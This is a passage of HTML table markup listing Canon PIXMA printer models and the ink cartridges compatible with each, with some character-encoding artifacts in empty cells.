width=\"208\"><p>CLI-751XL (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-751XL (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-751XL (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-751XL (Yellow)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-750 (Pigment Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-750XL (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA iP8770</p></td><td width=\"208\"><p>CLI-751 (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-751 (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-751 (Gray)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-751 (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-751 (Yellow)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-751XL (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-751XL (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-751XL (Gray)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-751XL (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-751XL (Yellow)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-750 (Pigment Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-750XL (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA iX6770</p></td><td width=\"208\"><p>CLI-751 (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-751 (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-751 (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-751 (Yellow)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-751XL (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-751XL (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-751XL (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-751XL (Yellow)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-750 (Pigment Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-750XL (Pigment Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-755XXL (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA iX6870</p></td><td width=\"208\"><p>CLI-751 (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-751 (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-751 (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-751 (Yellow)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-751XL (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-751XL (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-751XL (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-751XL (Yellow)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-750 (Pigment Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-750XL (Pigment Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-755XXL (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA MG2570S</p></td><td width=\"208\"><p>CL-746 (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CL-746S (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CL-746XL (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-745 (Pigment Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-745S (Pigment Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-745XL (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA MG2577S</p></td><td width=\"208\"><p>CL-746 (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CL-746S (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CL-746XL (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-745 (Pigment Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-745S (Pigment Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-745XL (Pigment Black)</p></td></tr></tbody></table><table width=\"378\"><tbody><tr><td width=\"170\"><p><strong>Model</strong></p></td><td width=\"208\"><p><strong>Cartridge / Bottle</strong></p></td></tr><tr><td width=\"170\"><p>PIXMA MG3570</p></td><td width=\"208\"><p>CL-741 (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CL-741XL (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-740 (Pigment Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-740/CL-741 Value Pack</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-740XL (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA MG3670</p></td><td width=\"208\"><p>CL-741 (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CL-741XL (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-740 (Pigment Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-740/CL-741 Value Pack</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-740XL (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA MG7570</p></td><td width=\"208\"><p>CLI-751 (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-751 (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-751 (Gray)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-751 (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-751 (Yellow)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-751XL (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-751XL (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-751XL (Gray)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-751XL (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-751XL (Yellow)</p></td></tr><tr><td width=\"170\"><p>PIXMA MP160</p></td><td width=\"208\"><p>CL-41 (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-40 (Pigment Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-40/CL-41 Value Pack</p></td></tr><tr><td width=\"170\"><p>PIXMA MP170</p></td><td width=\"208\"><p>CL-41 (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-40 (Pigment Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-40/CL-41 Value Pack</p></td></tr><tr><td width=\"170\"><p>PIXMA MP180</p></td><td width=\"208\"><p>CL-41 (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-40 (Pigment Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-40/CL-41 Value Pack</p></td></tr><tr><td width=\"170\"><p>PIXMA MP228</p></td><td width=\"208\"><p>CL-41 (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CL-831 (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-40 (Pigment Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-40/CL-41 Value Pack</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-830 (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA MP237</p></td><td width=\"208\"><p>CL-811 (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CL-811XL (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810 (Pigment Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810 Twin Pack</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810/CL-811 Value Pack</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810XL (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA MP245</p></td><td width=\"208\"><p>CL-811 (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CL-811XL (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810 (Pigment Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810 Twin Pack</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810/CL-811 Value Pack</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810XL (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA MP258</p></td><td width=\"208\"><p>CL-811 (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CL-811XL (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810 (Pigment Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810 Twin Pack</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810/CL-811 Value Pack</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810XL (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA MP276</p></td><td width=\"208\"><p>CL-811 (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CL-811XL (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810 (Pigment Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810 Twin Pack</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810/CL-811 Value Pack</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810XL (Pigment Black)</p></td></tr></tbody></table><table width=\"378\"><tbody><tr><td width=\"170\"><p><strong>Model</strong></p></td><td width=\"208\"><p><strong>Cartridge / Bottle</strong></p></td></tr><tr><td width=\"170\"><p>PIXMA MP287</p></td><td width=\"208\"><p>CL-811 (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CL-811XL (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810 (Pigment Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810 Twin Pack</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810/CL-811 Value Pack</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810XL (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA MP460</p></td><td width=\"208\"><p>CL-41 (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-40 (Pigment Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-40/CL-41 Value Pack</p></td></tr><tr><td width=\"170\"><p>PIXMA MP476</p></td><td width=\"208\"><p>CL-41 (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CL-831 (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-40 (Pigment Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-40/CL-41 Value Pack</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-830 (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA MP486</p></td><td width=\"208\"><p>CL-811 (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CL-811XL (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810 (Pigment Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810 Twin Pack</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810/CL-811 Value Pack</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810XL (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA MP496</p></td><td width=\"208\"><p>CL-811 (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CL-811XL (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810 (Pigment Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810 Twin Pack</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810/CL-811 Value Pack</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810XL (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA MP497</p></td><td width=\"208\"><p>CL-811 (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CL-811XL (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810 (Pigment Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810 Twin Pack</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810/CL-811 Value Pack</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810XL (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA MP500</p></td><td width=\"208\"><p>CLI-8 (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-8 (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-8 (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-8 (Yellow)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-5 (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA MP520</p></td><td width=\"208\"><p>CLI-8 (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-8 (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-8 (Yellow)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-5 (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA MP530</p></td><td width=\"208\"><p>CLI-8 (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-8 (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-8 (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-8 (Yellow)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-5 (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA MP568</p></td><td width=\"208\"><p>CLI-821 (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-821 (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-821 (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-821 (Yellow)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-820 (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA MP600</p></td><td width=\"208\"><p>CLI-8 (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-8 (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-8 (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-8 (Yellow)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-5 (Pigment Black)</p></td></tr></tbody></table><table width=\"378\"><tbody><tr><td width=\"170\"><p><strong>Model</strong></p></td><td width=\"208\"><p><strong>Cartridge / Bottle</strong></p></td></tr><tr><td width=\"170\"><p>PIXMA MP610</p></td><td width=\"208\"><p>CLI-8 (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-8 (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-8 (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-8 (Yellow)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-5 (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA MP628</p></td><td width=\"208\"><p>CLI-821 (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-821 (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-821 (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-821 (Yellow)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-820 (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA MP638</p></td><td width=\"208\"><p>CLI-821 (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-821 (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-821 (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-821 (Yellow)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-820 (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA MP648</p></td><td width=\"208\"><p>CLI-821 (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-821 (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-821 (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-821 (Yellow)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-820 (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA MP800</p></td><td width=\"208\"><p>CLI-8 (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-8 (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-8 (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-8 (Yellow)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-5 (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA MP800R</p></td><td width=\"208\"><p>CLI-8 (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-8 (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-8 (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-8 (Yellow)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-5 (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA MP810</p></td><td width=\"208\"><p>CLI-8 (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-8 (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-8 (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-8 (Yellow)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-5 (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA MP830</p></td><td width=\"208\"><p>CLI-8 (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-8 (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-8 (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-8 (Yellow)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-5 (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA MP970</p></td><td width=\"208\"><p>CLI-8 (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-8 (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-8 (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-8 (Photo Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-8 (Photo Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-8 (Yellow)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-5 (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA MP988</p></td><td width=\"208\"><p>CLI-821 (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-821 (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-821 (Gray)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-821 (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-821 (Yellow)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-820 (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA MP996</p></td><td width=\"208\"><p>CLI-821 (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-821 (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-821 (Gray)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-821 (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-821 (Yellow)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-820 (Pigment Black)</p></td></tr></tbody></table><table width=\"378\"><tbody><tr><td width=\"170\"><p><strong>Model</strong></p></td><td width=\"208\"><p><strong>Cartridge / Bottle</strong></p></td></tr><tr><td width=\"170\"><p>PIXMA MX308</p></td><td width=\"208\"><p>CL-41 (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CL-831 (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-40 (Pigment Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-40/CL-41 Value Pack</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-830 (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA MX328</p></td><td width=\"208\"><p>CL-811 (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CL-811XL (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810 (Pigment Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810 Twin Pack</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810/CL-811 Value Pack</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810XL (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA MX338</p></td><td width=\"208\"><p>CL-811 (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CL-811XL (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810 (Pigment Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810 Twin Pack</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810/CL-811 Value Pack</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810XL (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA MX347</p></td><td width=\"208\"><p>CL-811 (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CL-811XL (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810 (Pigment Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810 Twin Pack</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810/CL-811 Value Pack</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810XL (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA MX366</p></td><td width=\"208\"><p>CL-811 (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CL-811XL (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810 (Pigment Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810 Twin Pack</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810/CL-811 Value Pack</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810XL (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA MX426</p></td><td width=\"208\"><p>CL-811 (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CL-811XL (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810 (Pigment Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810 Twin Pack</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810/CL-811 Value Pack</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810XL (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA MX876</p></td><td width=\"208\"><p>CLI-821 (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-821 (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-821 (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-821 (Yellow)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-820 (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA MX886</p></td><td width=\"208\"><p>CLI-726 (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-726 (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-726 (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-726 (Yellow)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-725 (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA PRO-1</p></td><td width=\"208\"><p>PGI-29 (Chroma Optimizer)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-29 (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-29 (Dark Gray)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-29 (Gray)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-29 (Light Gray)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-29 (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-29 (Matte Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-29 (Photo Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-29 (Photo Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-29 (Photo Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-29 (Red)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-29 (Yellow)</p></td></tr></tbody></table><table width=\"378\"><tbody><tr><td width=\"170\"><p><strong>Model</strong></p></td><td width=\"208\"><p><strong>Cartridge / Bottle</strong></p></td></tr><tr><td width=\"170\"><p>PIXMA PRO-10</p></td><td width=\"208\"><p>PGI-72 (Chroma Optimizer)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-72 (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-72 (Gray)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-72 (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-72 (Matte Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-72 (Photo Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-72 (Photo Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-72 (Photo Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-72 (Red)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-72 (Yellow)</p></td></tr><tr><td width=\"170\"><p>PIXMA PRO-100</p></td><td width=\"208\"><p>CLI-42 (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-42 (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-42 (Gray)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-42 (Light Gray)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-42 